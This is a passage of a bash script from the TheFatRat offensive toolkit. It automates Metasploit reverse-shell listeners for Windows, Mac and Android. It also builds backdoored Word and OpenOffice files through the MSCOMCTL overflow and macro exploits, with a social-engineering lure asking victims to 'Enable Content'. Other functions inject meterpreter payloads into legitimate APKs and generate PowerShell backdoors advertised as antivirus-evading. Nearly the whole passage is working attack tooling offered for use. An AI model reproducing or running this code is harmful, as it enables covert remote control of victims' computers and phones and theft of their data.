"temp/meterpreter_windows.rc" read -p ' Set LPORT: ' uservar echo set LPORT $uservar >> "temp/meterpreter_windows.rc" echo set AutoRunScript multi_console_command -rc $path/postexploit/$pe >> "temp/meterpreter_windows.rc" echo set ExitOnSession false >> "temp/meterpreter_windows.rc" echo exploit -j >> "temp/meterpreter_windows.rc" zenity --question --text="Do you want to save this configuration to use in future ?" if [ $? = 0 ] ; then save=$(zenity --entry --title="Save Msfconsole Config" --width=100 --height=100 --text="Write the name for this config." --entry-text="windows-config"); cp $path/temp/meterpreter_windows.rc $list/$save.rc >/dev/null 2>&1 echo -e okegreen "Configuration file saved to $list/$save.rc" xterm -fa monaco -fs 13 -bg black -e $msfconsole -r "temp/meterpreter_windows.rc" clear else xterm -fa monaco -fs 13 -bg black -e $msfconsole -r "temp/meterpreter_windows.rc" clear fi elif test $fatrat1 == '3' #Mac then rm temp/*.rc > /dev/null 2>&1 touch "temp/meterpreter_mac.rc" echo use exploit/multi/handler > "temp/meterpreter_mac.rc" echo set PAYLOAD osx/x86/shell_reverse_tcp >> "temp/meterpreter_mac.rc" echo -e $okegreen "" echo -e $yellow "Your local IP address is : $lanip" echo -e $yellow "Your public IP address is : $publicip" echo -e $yellow "Your Hostname is : $hostn" echo -e $green "" read -p ' Set LHOST IP: ' uservar echo set LHOST $uservar >> "temp/meterpreter_mac.rc" read -p ' Set LPORT: ' uservar echo set LPORT $uservar >> "temp/meterpreter_mac.rc" echo set ExitOnSession false >> "temp/meterpreter_mac.rc" echo exploit -j >> "temp/meterpreter_mac.rc" zenity --question --text="Do you want to save this configuration to use in future ?" if [ $? = 0 ] ; then save=$(zenity --entry --title="Save Msfconsole Config" --width=100 --height=100 --text="Write the name for this config." --entry-text="mac-config"); cp $path/temp/meterpreter_mac.rc $list/$save.rc >/dev/null 2>&1 echo -e okegreen "Configuration file saved to $list/$save.rc" xterm -fa monaco -fs 13 -bg black -e $msfconsole -r "temp/meterpreter_mac.rc" clear else xterm -fa monaco -fs 13 -bg black -e $msfconsole -r "temp/meterpreter_mac.rc" clear fi elif test $fatrat1 == '4' #Android then rm temp/*.rc > /dev/null 2>&1 touch "temp/meterpreter_android.rc" echo use exploit/multi/handler > "temp/meterpreter_android.rc" payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "android/meterpreter/reverse_http" FALSE "android/meterpreter/reverse_https" FALSE "android/meterpreter/reverse_tcp" FALSE "android/shell/reverse_http" FALSE "android/shell/reverse_https" FALSE "android/shell/reverse_tcp" --width 350 --height 300) > /dev/null 2>&1 echo set PAYLOAD $payload >> "temp/meterpreter_android.rc" echo -e $okegreen "" echo -e $yellow "Your local IP address is : $lanip" echo -e $yellow "Your public IP address is : $publicip" echo -e $yellow "Your Hostname is : $hostn" echo -e $okegreen "" read -p ' Set LHOST IP: ' uservar echo set LHOST $uservar >> "temp/meterpreter_android.rc" read -p ' Set LPORT: ' uservar echo set LPORT $uservar >> "temp/meterpreter_android.rc" echo set ExitOnSession false >> "temp/meterpreter_android.rc" echo exploit -j >> "temp/meterpreter_android.rc" zenity --question --text="Do you want to save this configuration to use in future ?" if [ $? = 0 ] ; then save=$(zenity --entry --title="Save Msfconsole Config" --width=100 --height=100 --text="Write the name for this config." --entry-text="android-config"); cp $path/temp/meterpreter_android.rc $list/$save.rc >/dev/null 2>&1 echo -e okegreen "Configuration file saved to $list/$save.rc" xterm -fa monaco -fs 13 -bg black -e $msfconsole -r "temp/meterpreter_android.rc" clear else xterm -fa monaco -fs 13 -bg black -e $msfconsole -r "temp/meterpreter_android.rc" clear fi elif test $fatrat1 == '5' then listener=$(zenity --file-selection --file-filter='RC files (rc) | *.rc' --title="Load your config file" --filename=$path/config/listeners/ ); ret=$? if [ $ret = "0" ]; then xterm -fa monaco -fs 13 -bg black -e $msfconsole -r $listener clear menu fi if [ $ret = "1" ]; then clear fi elif test $fatrat1 == '6' then clear menu else echo -e " Incorrect Number" fi echo -n -e " Do you want exit? ( Yes / No ) : " read back if [ $back != 'n' ] && [ $back != 'N' ] then clear exit elif [ $back != 'y' ] && [ $back != 'Y' ] then clisteners fi } function microsploit() { #metasploit modules #microsoft metasploit packet auto create backdoor macro attack #code by edo maland > screetsec #part of fatrat feature #compatible with metasploit metasploit v4.14.0-dev { new payload in metasp 2017 like macro} APPNAME='Microsfot Metasploit Packet [ Easy ]' VERSION='1.0.0' NAME='Screetsec - Edo Malad ' CODENAME='Mario Bros' clear echo -e $red" <==============================================>" echo -e $white" ||$okegreen _____ _ _____ _ _ _ $white||" echo -e $white" ||$okegreen | |_|___ ___ ___| __|___| |___|_| |_ $white||" echo -e $white" ||$okegreen | | | | | _| _| . |__ | . | | . | | _| $white||" echo -e $white" ||$okegreen |_|_|_|_|___|_| |___|_____| _|_|___|_|_| $white||" echo -e $white" ||$okegreen | | $white||" echo -e $red" <===================================================>" echo -e "\t$white|| "$white" |=| "$okegreen"$APPNAME $white||" echo -e "\t|| $white |=| "$okegreen"Version : $VERSION \t\t $white ||" echo -e "\t|| $white |=| "$okegreen"Code by : $NAME $white || " echo -e "\t|| $white |=| "$okegreen"Codename: $CODENAME $white \t\t || " echo -e $white"\t||"$red"============================================$white||\n" echo -e $white" |"$okegreen"1$white| "$cyan"Microsoft Stack overflow in MSCOMCTL.OCX" echo -e $white" |"$okegreen"2$white| "$cyan"The Microsoft Office Macro on Windows " echo -e $white" |"$okegreen"3$white| "$cyan"The Microsoft Office Macro on Mac OS X " echo -e $white" |"$okegreen"4$white| "$cyan"Apache OpenOffice on Windows (PSH)" echo -e $white" |"$okegreen"5$white| "$cyan"Apache OpenOffice on Linux/OSX (Python)" echo -e $white" |"$okegreen"6$white| "$cyan"Exit\n" # Seems to fix some metasploit bugs rm -rf ~/.msf4/local/* >/dev/null 2>&1 echo -n -e $red' \033[4mMicrosploit@fatrat:\033[0m>> '; tput sgr0 read choice case $choice in 1) echo -e $red" Worked on Microsoft Office 2007 [no-SP/SP1/SP2/SP3] English on Windows [XP SP3 / 7 SP1] " echo -e $okegreen"" echo -e $yellow "Your local IP address is : $lanip" echo -e $yellow "Your public IP address is : $publicip" echo -e $yellow "Your Hostname is : $hostn" echo -e $okegreen "" echo -ne " SET LHOST : ";tput sgr0 read yourip echo "" echo -ne $okegreen " SET LPORT : ";tput sgr0 read yourport echo "" echo -ne $okegreen " Please enter the base name for output files :" ;tput sgr0 read fira echo "" payloads=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "windows/shell_bind_tcp" FALSE "windows/shell/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp_dns" FALSE "windows/meterpreter/reverse_http" FALSE "windows/meterpreter/reverse_https" --width 350 --height 265) > /dev/null 2>&1 spinlong echo "" echo "" gboor spinlong echo "" rm -rf $path/temp/* >/dev/null 2>&1 touch $meterp echo "use exploit/windows/fileformat/ms12_027_mscomctl_bof" >$meterp echo "set PAYLOAD $payloads" >> $meterp echo "set LHOST $yourip" >> $meterp echo "set LPORT $yourport" >> $meterp echo "set FILENAME $fira.doc" >> $meterp echo "exploit" >> $meterp echo "exit -y" >> $meterp msploitr xterm -T " TheFatRat < DOC BUILDER > " -geometry 110x23 -e "$msfconsole -r $meterp | tee temp/xterm.tmp" rm -rf $meterp >/dev/null 2>&1 cat $path/temp/xterm.tmp | while read LINE do echo $LINE >> $msploit done rm -rf $path/temp/xterm.tmp >/dev/null 2>&1 echo "" mv ~/.msf4/local/$fira.doc $path/output/$fira.doc >/dev/null 2>&1 echo -e $okegreen"" fidoc=$path/output/$fira.doc if [ -f "$fidoc" ] then echo -e $yellow" Backdoor doc Saved To : $path/output/$fira.doc " echo -e read -rsp $'Press any key to return to menu\n' -n 1 key microsploit else echo -e $red "There was a problem in the creation of your Backdoor DOC , check $path/logs/msploit.log for more information about the error ." echo -e $green "" read -rsp $'Press any key to return to menu\n' -n 1 key microsploit fi ;; 2) echo -e $red"\n Worked on Microsoft Office on Windows " echo -e $okegreen"" echo -e $yellow "Your local IP address is : $lanip" echo -e $yellow "Your public IP address is : $publicip" echo -e $yellow "Your Hostname is : $hostn" echo -e $okegreen "" echo -ne " SET LHOST : ";tput sgr0 read yourip echo "" echo -ne $okegreen " SET LPORT : ";tput sgr0 read yourport echo "" echo -ne $okegreen " Enter the base name for output files : " ;tput sgr0 read fira echo "" #setup body echo -ne $okegreen " Enter the message for the document body (ENTER = default) : " ;tput sgr0 read bodys #echo $bodys if [[ "$bodys" == "" ]]; then bodys="Contents of this document are protected. Please click Enable Content to continue." fi #setupexe echo"" echo -ne $okegreen " Are u want Use custom exe file backdoor ( y/n ): " ;tput sgr0 read exe if [ $exe != 'y' ] && [ $exe != 'Y' ] then #payload n echo "" payloads=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "windows/shell_bind_tcp" FALSE "windows/shell/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp_dns" FALSE "windows/meterpreter/reverse_http" FALSE "windows/meterpreter/reverse_https" --width 350 --height 265) > /dev/null 2>&1 spinlong echo "" echo "" gboor spinlong echo "" rm -rf $path/temp/* >/dev/null 2>&1 touch $meterp echo "use exploit/multi/fileformat/office_word_macro" >$meterp echo "set PAYLOAD $payloads" >> $meterp echo "set LHOST $yourip" >> $meterp echo "set LPORT $yourport" >> $meterp echo "set FILENAME $fira.docm" >> $meterp echo "set BODY $bodys" >> $meterp echo "exploit" >> $meterp echo "exit -y" >> $meterp msploitr xterm -T " TheFatRat < DOC BUILDER > " -geometry 110x23 -e "$msfconsole -r $meterp | tee $path/temp/xterm.tmp" rm -rf $meterp >/dev/null 2>&1 cat $path/temp/xterm.tmp | while read LINE do echo $LINE >> $msploit done rm -rf $path/temp/xterm.tmp >/dev/null 2>&1 echo "" mv ~/.msf4/local/$fira.docm $path/output/$fira.docm >>$msploit 2>&1 echo -e $okegreen"" fidoc=$path/output/$fira.docm if [ -f "$fidoc" ] then echo -e $yellow" Backdoor doc Saved To : $path/output/$fira.docm " echo -e read -rsp $'Press any key to return to menu\n' -n 1 key microsploit else echo -e $red "There was a problem in the creation of your Backdoor DOC , check $path/logs/msploit.log for more information about the error ." echo -e $green "" read -rsp $'Press any key to return to menu\n' -n 1 key microsploit fi elif [ $exe != 'n' ] && [ $exe != 'N' ] then #payload y echo "" exef=$(zenity --file-selection --file-filter='EXE files (exe) | *.exe' --title="Select your backdoor executable file"); echo "" payloads=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "windows/shell_bind_tcp" FALSE "windows/shell/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp_dns" FALSE "windows/meterpreter/reverse_http" FALSE "windows/meterpreter/reverse_https" --width 350 --height 265) > /dev/null 2>&1 spinlong echo "" echo "" gboor spinlong echo "" rm -rf $path/temp/* >/dev/null 2>&1 touch $meterp echo "use exploit/multi/fileformat/office_word_macro" >$meterp echo "set PAYLOAD $payloads" >> $meterp echo "set LHOST $yourip" >> $meterp echo "set LPORT $yourport" >> $meterp echo "set FILENAME $fira.docm" >> $meterp echo "set BODY $bodys" >> $meterp echo "set EXE::Custom $exef" >> $meterp echo "exploit" >> $meterp echo "exit -y" >> $meterp msploitr xterm -T " TheFatRat < DOC BUILDER > " -geometry 110x23 -e "$msfconsole -r $meterp | tee $path/temp/xterm.tmp" rm -rf $meterp >/dev/null 2>&1 cat $path/temp/xterm.tmp | while read LINE do echo $LINE >> $msploit done rm -rf $path/temp/xterm.tmp >/dev/null 2>&1 echo "" mv ~/.msf4/local/$fira.docm $path/output/$fira.docm >>$msploit 2>&1 echo "" fidoc=$path/output/$fira.docm if [ -f "$fidoc" ] then echo -e $yellow" Backdoor doc Saved To : $path/output/$fira.docm " echo -e read -rsp $'Press any key to return to menu\n' -n 1 key microsploit else echo -e $red "There was a problem in the creation of your Backdoor DOC , check $path/logs/msploit.log for more information about the error ." echo -e $green "" read -rsp $'Press any key to return to menu\n' -n 1 key microsploit fi fi ;; 3) echo -e $red" Worked on Libre Office on Mac ( Python ) " echo -e $okegreen"" echo -e $yellow "Your local IP address is : $lanip" echo -e $yellow "Your public IP address is : $publicip" echo -e $yellow "Your Hostname is : $hostn" echo -e $okegreen "" echo -ne " SET LHOST : ";tput sgr0 read yourip echo "" echo -ne $okegreen " SET LPORT : ";tput sgr0 read yourport echo "" echo -ne $okegreen " Enter the base name for output files : " ;tput sgr0 read fira echo "" #setup body echo -ne $okegreen " Enter the message for the document body (ENTER = default) : " ;tput sgr0 read bodys #echo $bodys if [[ "$bodys" == "" ]]; then bodys="Contents of this document are protected. Please click Enable Content to continue." #echo $bodys fi #setupexe echo"" echo -ne $okegreen " Are u want Use custom exe file backdoor ( y/n ): " ;tput sgr0 read exe if [ $exe != 'y' ] && [ $exe != 'Y' ] then #payload n echo "" payloads=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "python/meterpreter/reverse_tcp" FALSE "generic/shell_reverse_tcp" --width 350 --height 265) > /dev/null 2>&1 spinlong echo "" echo "" gboor spinlong echo "" rm -rf $path/temp/* >/dev/null 2>&1 touch $meterp echo "use exploit/multi/fileformat/office_word_macro" >$meterp echo "set PAYLOAD $payloads" >> $meterp echo "set LHOST $yourip" >> $meterp echo "set LPORT $yourport" >> $meterp echo "set FILENAME $fira.docm" >> $meterp echo "set BODY $bodys" >> $meterp echo "set target 1" >> $meterp echo "exploit" >> $meterp echo "exit -y" >> $meterp msploitr xterm -T " TheFatRat < DOC BUILDER > " -geometry 110x23 -e "$msfconsole -r $meterp | tee $path/temp/xterm.tmp" rm -rf $meterp >/dev/null 2>&1 cat $path/temp/xterm.tmp | while read LINE do echo $LINE >> $msploit done rm -rf $path/temp/xterm.tmp >/dev/null 2>&1 echo "" mv ~/.msf4/local/$fira.docm $path/output/$fira.docm >>$msploit 2>&1 echo -e $okegreen"" fidoc=$path/output/$fira.docm if [ -f "$fidoc" ] then echo -e $yellow" Backdoor doc Saved To : $path/output/$fira.docm " echo -e read -rsp $'Press any key to return to menu\n' -n 1 key microsploit else echo -e $red "There was a problem in the creation of your Backdoor DOC , check $path/logs/msploit.log for more information about the error ." echo -e $green "" read -rsp $'Press any key to return to menu\n' -n 1 key microsploit fi elif [ $exe != 'n' ] && [ $exe != 'N' ] then #payload y echo "" exef=$(zenity --file-selection --file-filter='EXE files (exe) | *.exe' --title="Select your backdoor executable file"); fi echo "" payloads=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "python/meterpreter/reverse_tcp" FALSE "generic/shell_reverse_tcp" --width 350 --height 265) > /dev/null 2>&1 spinlong echo "" echo "" gboor spinlong echo "" rm -rf $path/temp/* >/dev/null 2>&1 touch $meterp echo "use exploit/multi/fileformat/office_word_macro" >$meterp echo "set PAYLOAD $payloads" >> $meterp echo "set LHOST $yourip" >> $meterp echo "set LPORT $yourport" >> $meterp echo "set FILENAME $fira.docm" >> $meterp echo "set BODY $bodys" >> $meterp echo "set set EXE::Custom $exef" >> $meterp echo "set target 1" >> $meterp echo "exploit" >> $meterp echo "exit -y" >> $meterp msploitr xterm -T " TheFatRat < DOC BUILDER > " -geometry 110x23 -e "$msfconsole -r $meterp | tee $path/temp/xterm.tmp" rm -rf $meterp >/dev/null 2>&1 cat $path/temp/xterm.tmp | while read LINE do echo $LINE >> $msploit done rm -rf $path/temp/xterm.tmp >/dev/null 2>&1 echo "" mv ~/.msf4/local/$fira.docm $path/output/$fira.docm >>$msploit 2>&1 echo -e $okegreen"" fidoc=$path/output/$fira.docm if [ -f "$fidoc" ] then echo -e $yellow" Backdoor doc Saved To : $path/output/$fira.docm " echo -e read -rsp $'Press any key to return to menu\n' -n 1 key microsploit else echo -e $red "There was a problem in the creation of your Backdoor DOC , check $path/logs/msploit.log for more information about the error ." echo -e $green "" read -rsp $'Press any key to return to menu\n' -n 1 key microsploit fi ;; 4) echo -e $red" Apache OpenOffice on Windows (PSH) " echo -e $okegreen"" echo -e $yellow "Your local IP address is : $lanip" echo -e $yellow "Your public IP address is : $publicip" echo -e $yellow "Your Hostname is : $hostn" echo -e $okegreen "" echo -ne " SET LHOST : ";tput sgr0 read yourip echo "" echo -ne $okegreen " SET LPORT : ";tput sgr0 read yourport echo "" echo -ne $okegreen " Enter the base name for output files : " ;tput sgr0 read fira echo "" #setup body echo -ne $okegreen " Enter the message for the document body (ENTER = default) : " ;tput sgr0 read bodys #echo $bodys if [[ "$bodys" == "" ]]; then bodys="Contents of this document are protected. Please click Enable Content to continue." #echo $bodys fi echo "" payloads=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "windows/shell_bind_tcp" FALSE "windows/shell/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp_dns" FALSE "windows/meterpreter/reverse_http" FALSE "windows/meterpreter/reverse_https" --width 350 --height 265) > /dev/null 2>&1 spinlong echo "" echo "" gboor spinlong echo "" rm -rf $path/temp/* >/dev/null 2>&1 touch $meterp echo "use exploit/multi/misc/openoffice_document_macro" >$meterp echo "set PAYLOAD $payloads" >> $meterp echo "set LHOST $yourip" >> $meterp echo "set LPORT $yourport" >> $meterp echo "set FILENAME $fira.odt" >> $meterp echo "set BODY $bodys" >> $meterp echo "exploit" >> $meterp echo "exit -y" >> $meterp msploitr xterm -T " TheFatRat < DOC BUILDER > " -geometry 110x23 -e "$msfconsole -r $meterp | tee $path/temp/xterm.tmp" rm -rf $meterp >/dev/null 2>&1 cat $path/temp/xterm.tmp | while read LINE do echo $LINE >> $msploit done rm -rf $path/temp/xterm.tmp >/dev/null 2>&1 echo "" mv ~/.msf4/local/$fira.odt $path/output/$fira.odt >>$msploit 2>&1 echo -e $okegreen"" fidoc=$path/output/$fira.odt if [ -f "$fidoc" ] then echo -e $yellow" Backdoor doc Saved To : $path/output/$fira.odt " echo -e read -rsp $'Press any key to return to menu\n' -n 1 key microsploit else echo -e $red "There was a problem in the creation of your Backdoor DOC , check $path/logs/msploit.log for more information about the error ." echo -e $green "" read -rsp $'Press any key to return to menu\n' -n 1 key microsploit fi ;; 5) echo -e $red" Apache OpenOffice on Linux (PSH) " echo -e $okegreen"" echo -e $yellow "Your local IP address is : $lanip" echo -e $yellow "Your public IP address is : $publicip" echo -e $yellow "Your Hostname is : $hostn" echo -e $okegreen "" echo -ne " SET LHOST : ";tput sgr0 read yourip echo "" echo -ne $okegreen " SET LPORT : ";tput sgr0 read yourport echo "" echo -ne $okegreen " Enter the base name for output files : " ;tput sgr0 read fira echo "" #setup body echo -ne $okegreen " Enter the message for the document body (ENTER = default) : " ;tput sgr0 read bodys #echo $bodys if [[ "$bodys" == "" ]]; then bodys="Contents of this document are protected. Please click Enable Content to continue." #echo $bodys fi echo "" payloads=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "python/meterpreter/reverse_tcp" FALSE "linux/x86/shell_reverse_tcp" FALSE "linux/x86/meterpreter/reverse_tcp" FALSE "osx/armle/shell_reverse_tcp" FALSE "osx/ppc/shell_reverse_tcp" FALSE "bsd/x86/shell/reverse_tcp" FALSE "solaris/x86/shell_reverse_tcp" --width 350 --height 300) > /dev/null 2>&1 spinlong echo "" echo "" gboor spinlong echo "" rm -rf $path/temp/* >/dev/null 2>&1 touch $meterp echo "use exploit/multi/misc/openoffice_document_macro" >$meterp echo "set PAYLOAD $payloads" >> $meterp echo "set LHOST $yourip" >> $meterp echo "set LPORT $yourport" >> $meterp echo "set FILENAME $fira.odt" >> $meterp echo "set BODY $bodys" >> $meterp echo "exploit" >> $meterp echo "exit -y" >> $meterp msploitr xterm -T " TheFatRat < DOC BUILDER > " -geometry 110x23 -e "$msfconsole -r $meterp | tee $path/temp/xterm.tmp" rm -rf $meterp >/dev/null 2>&1 cat $path/temp/xterm.tmp | while read LINE do echo $LINE >> $msploit done rm -rf $path/temp/xterm.tmp >/dev/null 2>&1 echo "" mv ~/.msf4/local/$fira.odt $path/output/$fira.odt >>$msploit 2>&1 echo -e $okegreen"" fidoc=$path/output/$fira.odt if [ -f "$fidoc" ] then echo -e $yellow" Backdoor doc Saved To : $path/output/$fira.odt " echo -e read -rsp $'Press any key to return to menu\n' -n 1 key microsploit else echo -e $red "There was a problem in the creation of your Backdoor DOC , check $path/logs/msploit.log for more information about the error ." echo -e $green "" read -rsp $'Press any key to return to menu\n' -n 1 key microsploit fi ;; 6) clear menu ;; *) microsploit ;; esac } #EMBEDBACKDOORAPK function embedapk() { clear echo -e $okegreen"[ ]===========================================================================$okegreen[ ]" echo -e $okegreen"[ ]$cyan $okegreen [ ]" echo -e $okegreen"[ ]$cyan ) ( ) ) ( ( ) $okegreen [ ] "; echo -e $okegreen"[ ]$cyan ( ( ( ( /( )\ ) ( /( ( /( )\ ) )\ ) ( /( ( $okegreen [ ] "; echo -e $okegreen"[ ]$cyan )\ )\ )\ )\())(()/( )\()) )\()) (()/((()/( )\()) )\ ) $okegreen[ ] "; echo -e $okegreen"[ ]$cyan ((_)((((_)( (((_) |((_)\ /(_)) ((_)\ ((_)\ /(_))/(_))((_)\ (()/( $okegreen[ ] "; echo -e $okegreen"[ ]$cyan (_) )\_ )\ )\___ |_ ((_)(_))_ ((_) ((_) (_)) (_)) _((_) /(_))_ $okegreen[ ] "; echo -e $okegreen"[ ]$cyan | _ ) (_)_\(_)((/ __|| |/ / | \ / _ \ / _ \ | _ \|_ _| | \| |(_)) __|$okegreen[ ] "; echo -e $okegreen"[ ]$cyan | _ \ / _ \ | (__ ' < | |) || (_) || (_) || / | | | .\` | | (_ |$okegreen[ ] "; echo -e $okegreen"[ ]$cyan |___/ /_/ \_\ \___| _|\_\ |___/ \___/ \___/ |_|_\|___| |_|\_| \___|$okegreen[ ]"; echo -e $okegreen"[ ]$okegreen===========================================================================$okegreen[ ]" echo -e $okegreen"[ ]$red Embed a Metasploit Payload in an original .apk files $okegreen[ ]" echo -e $okegreen"[ ]$red This script is POC for injecting metasploit payload arbitary apk backdoor $okegreen[ ]" echo -e $okegreen"[ ]$okegreen===========================================================================$okegreen[ ]" echo "" echo "Cleaning Temp files" rm -rf temp/* rm -rf output/* sleep 2 echo "Done!" echo -e $okegreen"" echo -e $yellow "Your local IP address is : $lanip" echo -e $yellow "Your public IP address is : $publicip" echo -e $yellow "Your Hostname is : $hostn" echo -e $okegreen "" echo -ne " SET LHOST : ";tput sgr0 read yourip echo "" echo -ne $okegreen "SET LPORT : ";tput sgr0 read yourport echo "" copyfile=$(zenity --file-selection --file-filter='APK files (apk) | *.apk' --title="Select your app/game apk file"); cp $copyfile $path/temp/app.apk >/dev/null 2>&1 apkt="$path/temp/app.apk" if [ ! -f $apkt ]; then zenity --no-wrap --error --text="`printf "There was a problem copying your APK file \n to a temporary location \n try with other apk ."`" read -rsp $'Press any key to continue to return to fatrat menu\n' -n 1 key menu fi echo "" payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "android/meterpreter/reverse_http" FALSE "android/meterpreter/reverse_https" FALSE "android/meterpreter/reverse_tcp" FALSE "android/shell/reverse_http" FALSE "android/shell/reverse_https" FALSE "android/shell/reverse_tcp" --width 350 --height 300) > /dev/null 2>&1 echo "" echo "" spinlong echo "" sleep 1 method=$(zenity --list --radiolist --column "Pick" --column "Action" TRUE "Use new Backdoor-apk method" FALSE "Use old Fatrat method" --text="Select tool to create apk :"); case $method in "Use new Backdoor-apk method") echo "" spinlong outf="app_backdoor.apk" gboor2 rm -f $apkconfig >/dev/null 2>&1 touch $apkconfig echo "app.apk" > $apkconfig echo "Rat.apk" >> $apkconfig echo $payload >> $apkconfig echo $yourip >> $apkconfig echo $yourport >> $apkconfig ./backdoor_apk echo "" sleep 2 read -rsp $'Press any key to continue to return to fatrat menu\n' -n 1 key clear menu ;; "Use old Fatrat method") echo "" spinlong outf="app_backdoored.apk" gboor2 echo "Creating RAT payload with msfvenom" echo -e $okegreen "" $msfvenom -f raw -p $payload LHOST=$yourip LPORT=$yourport -o $path/temp/payload.apk echo "Done !" sleep 2 echo "Starting the merging process of RAT with the APK you selected" echo "" ruby $apkembed $path/temp/app.apk echo "" sleep 2 fiapk=$path/temp/app_backdoored.apk if [ -f "$fiapk" ] then echo -e $green "[*] Backdoor apk created sucefully" else echo -e $red "[!] There was an error in the creation of your RAT APK file , the possible reasons are : - The architecture of the file is not for android - The original APK is protected - It was not possible to inject the payload in the hook you selected (in this case select a different hook point)" echo -e $green "" rm -rf temp/* > /dev/null 2>&1 read -rsp $'Press any key to return to fatrat menu\n' -n 1 key menu fi #looking if already exists a previous backdoor apk created and renaming it ren=`shuf -i 1-1000 -n 1` back=$path/backdoored/app_backdoored.apk if [ -f "$back" ] then mv $path/backdoored/app_backdoored.apk $path/backdoored/app_backdoored_$ren.apk echo -e $yellow "FatRat Detected that you already had a previous created backdoor file in ($path/backdoored/) with the name app_backdoored.apk ." echo -e $okegreen "FatRat have renamed your old backdoor to app_backdoored_$ren.apk" mv $path/temp/app_backdoored.apk $path/backdoored/app_backdoored.apk else mv $path/temp/app_backdoored.apk $path/backdoored/app_backdoored.apk fi varopt="$path/backdoored/app_backdoored.apk" if [ ! -f $varopt ]; then echo -e $red "[!] There was an error copying your Rat app to final destination" read -rsp $'Press any key to continue to return to fatrat menu\n' -n 1 key menu fi echo -e $yellow "Your payload has been successfully & signed and it is located at : $path/backdoored/app_backdoored.apk" sleep 2 echo -e $okegreen "Removing temporary files" sleep 2 rm -rf $path/temp/* >/dev/null 2>&1 echo -e $okegreen "" read -rsp $'Press any key to return to fatrat menu\n' -n 1 key echo clear menu ;; *) clear menu ;; esac } ########################################################### #PwnWind v1.2 #Developed or original code Edo Maland (Screetsec) ############################################################ function PwnWinds() { clear echo "" echo "" echo -e $cyan" [ Select an Option To Begin >>" echo "" echo -e $lightgreen" ________ ___ ______ _________ "; echo " ___ __ \__ __________ | / /__(_)____________ /_______"; echo " __ /_/ /_ | /| / /_ __ \_ | /| / /__ /__ __ \ __ /__ ___/"; echo " _ ____/__ |/ |/ /_ / / /_ |/ |/ / _ / _ / / / /_/ / _(__ ) "; echo " /_/ ____/|__/ /_/ /_/____/|__/ /_/ /_/ /_/\__,_/ /____/ "; echo "" echo -e $cyan" ______ " echo " .- -. " echo " / \ " echo " |, .-. .-. ,| " echo " | )(_ / \_ )( |" echo " |/ /\ \| " echo -e $red" $yellow (@_ $cyan <__ ^^ __> " echo -e $red" _ ) \_______$cyan""\__|IIIIII|__/$red""____________________ " echo -e $red" (_)$yellow\@8@8{}<$red""________________________________________$yellow> " echo -e $red" )_/ $cyan \ IIIIII / " echo -e $red" $yellow (@ $cyan -------- " echo -e $cyan" PwnWind Version $red v1.2 " echo -e $cyan" Pwned Windows with backdoor" echo -e " Author : $red""Edo Maland (Screetsec)" echo -e $red" Powershell$cyan Injection attacks on any$red Windows Platform "; echo "" echo -e $yellow" [1] $okegreen Create a bat file+Powershell (FUD 100%)" echo -e $yellow" [2] $okegreen Create exe file with C# + Powershell (FUD 100%) " echo -e $yellow" [3] $okegreen Create exe file with apache + Powershell (FUD 100%)" echo -e $yellow" [4] $okegreen Create exe file with C + Powershell (FUD 98 %)" echo -e $yellow" [5] $okegreen Create Backdoor with C + Powershell + Embed Pdf (FUD 80%)" echo -e $yellow" [6] $okegreen Create Backdoor with C / Meteperter_reverse_tcp (FUD 97%)" echo -e $yellow" [7] $okegreen Create Backdoor with C / Metasploit Staging Protocol (FUD 98%)" echo -e $yellow" [8] $okegreen Back to Menu " echo -e $yellow" " echo -n -e $red' \033[4mPwnWind@fatrat:\033[0m>> '; tput sgr0 #insert your choice read fatrat1 if test $fatrat1 == '1' #NUMBER 1 BEBE then echo "" echo -e $okegreen"" echo -e $yellow "Your local IP address is : $lanip" echo -e $yellow "Your public IP address is : $publicip" echo -e $yellow "Your Hostname is : $hostn" echo -e $okegreen "" echo -ne " SET LHOST : ";tput sgr0 read yourip echo "" echo -ne $okegreen " SET LPORT : ";tput sgr0 read yourport echo "" echo -ne $okegreen " Please enter the base name for output files :" ;tput sgr0 read fira payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "windows/shell_bind_tcp" FALSE "windows/shell/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp_dns" FALSE "windows/meterpreter/reverse_http" FALSE "windows/meterpreter/reverse_https" --width 350 --height 265) > /dev/null 2>&1 spinlong echo "" echo "" gboor spinlong echo "" $pwned $payload $yourip $yourport > /dev/null 2>&1 echo "" echo "" cat powershell_attack.txt sleep 2 rm unicorn.rc mv powershell_attack.txt output/$fira.bat echo "" echo -e $okegreen"" echo -e "Backdoor Saved To output Folder " elif test $fatrat1 == '2' #cPAGAR-POWERSHELL then echo "" echo -e $okegreen"" echo -e $yellow "Your local IP address is : $lanip" echo -e $yellow "Your public IP address is : $publicip" echo -e $yellow "Your Hostname is : $hostn" echo -e $okegreen "" echo -ne " SET LHOST : ";tput sgr0 read yourip echo "" echo -ne $okegreen " SET LPORT : ";tput sgr0 read yourport echo "" echo -ne $okegreen " Please enter the base name for output files :" ;tput sgr0 read fira payload=$(zenity --list --title "☣ TheFatRat ☣" --text 